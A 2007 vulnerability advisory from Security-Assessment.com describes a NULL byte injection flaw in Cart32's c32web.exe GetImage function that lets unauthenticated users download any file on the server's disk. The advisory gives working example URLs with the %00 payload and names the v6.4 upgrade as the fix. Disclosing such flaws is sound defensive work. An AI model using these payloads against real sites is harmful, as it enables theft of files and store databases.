cart32-download.txt

`========================================================================  
= Cart32 Arbitrary File Download Vulnerability  
=  
= Vendor Website:   
= http://www.cart32.com  
=  
= Affected Version:  
= -- All releases prior to and including v6.3  
=  
= Public disclosure on Thursday 4th October 2007  
=  
========================================================================  
Available online at:  
http://www.security-assessment.com/files/advisories/2007-10-04_Cart32_Ar  
bitrary_File_Download.pdf  
  
== Overview ==  
Security-Assessment.com has discovered a highly critical vulnerability  
within the Cart32 administrative application. The vulnerability allows  
a remote unauthenticated user to arbitrarily download any file present  
on the same physical disk that Cart32 is installed on.   
  
The vulnerability stems from a NULL byte injection flaw within a file  
read function.  
  
== Exploitation ==  
  
The function GetImage, part of c32web.exe displays various images from  
a supplied "ImageName" variable.   
http://host.com/scripts/c32web.exe/GetImage?ImageName=test.gif  
  
C32web.exe attempts to prevent arbitrary files from being disclosed by  
only returning files with an extension of .jpg, .gif, .png and .pdf.  
  
Any file, of any extension type can be downloaded when a NULL byte is  
injected into the ImageName variable with a valid file extension  
suffixed  
directly after.  
  
Example  
http://host.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.gi  
f  
http://host.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.jp  
g  
http://host.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.pd  
f  
http://host.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.pn  
g  
  
This vulnerability can be used to read any file on disk, including the  
cart32 database.  
  
== Solutions ==  
  
A new build of Cart32 v6.4 is available to address this vulnerability.  
Security-Assessment.com highly recommends all Cart32 users to upgrade.  
  
== Credit ==  
  
Discovered and advised to McMurtrey/Whitaker & Associates, Inc  
October 2007 by Paul Craig of Security-Assessment.com  
  
== Greetings ==  
  
To all my fallen SA brothers.  
SoSD  
www.kiwicon.org : Will you be there?   
  
  
== About Security-Assessment.com ==  
  
Security-Assessment.com is Australasia's leading team of Information   
Security consultants specialising in providing high quality Information   
Security services to clients throughout the Asia Pacific region. Our   
clients include some of the largest globally recognised companies in   
areas such as finance, telecommunications, broadcasting, legal and   
government. Our aim is to provide the very best independent advice and   
a high level of technical expertise while creating long and lasting   
professional relationships with our clients.  
  
Security-Assessment.com is committed to security research and   
development, and its team continues to identify and responsibly publish   
vulnerabilities in public and private software vendor's products.   
Members of the Security-Assessment.com R&D team are globally recognised   
through their release of whitepapers and presentations related to new   
security research.  
  
Security-Assessment.com is an Endorsed Commonwealth Government of   
Australia supplier and sits on the Australian Government   
Attorney-General's Department Critical Infrastructure Project panel.   
We are certified by both Visa and MasterCard under their Payment   
Card Industry Data Security Standard Programs.  
  
  
  
Paul Craig  
Security-Assessment.com  
  
`